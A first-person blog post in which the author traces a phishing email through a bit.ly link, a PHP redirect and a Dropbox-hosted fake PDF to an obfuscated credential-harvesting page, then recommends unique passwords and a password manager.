Today I received a sample email that some of my coworkers caught. They asked me to look into it. The email link led to a bit.ly link, which I was able to extract and through a clever little trick, appending the bit.ly link with a + character doesn’t load the site that the bit.ly link goes to but tells you about the link. This link has been clicked on about 7000 times. Already I know we’re dealing with malware, so now it’s not a question of if it’s a rabbit hole, but rather, how deep does it go?

I pulled the bit.ly link contents out and handed it to curl on the terminal in my Macbook Pro. I don’t expect curl to do anything but show me the text of where this bit.ly link goes. It heads to a PHP file on a presumably hacked web-server or blog. The PHP itself is a HTTP refresh-redirect to a Dropbox hosted file. So I opened up my Virus Lab VM and followed where this led. The Dropbox content said it was a 1MB PDF file, but when I opened that, it led to a phishing attempt.

The phishing hack had an obnoxious URL attached to it, so I pulled that out and discovered it was encoded in base64 format. I decoded that text chunk online, and it revealed a Javascript script-block formed by a single call to document.write(unescape()) function.

Whoever it was, went to a long length to obfuscate their malware. Ultimately it led nowhere because we caught it. I find this sort of thing fascinating to pull apart, like an easy little puzzle to unravel. The phishing attempt is for email username and password, and if someone falls for that, then thanks to people being usually lazy with passwords, once you have one password, chances are you have all of them on every other site.

Just another reason to use a password manager and have individual passwords per individual sites. If one breaches, then the damage is limited to that one site, not all of them.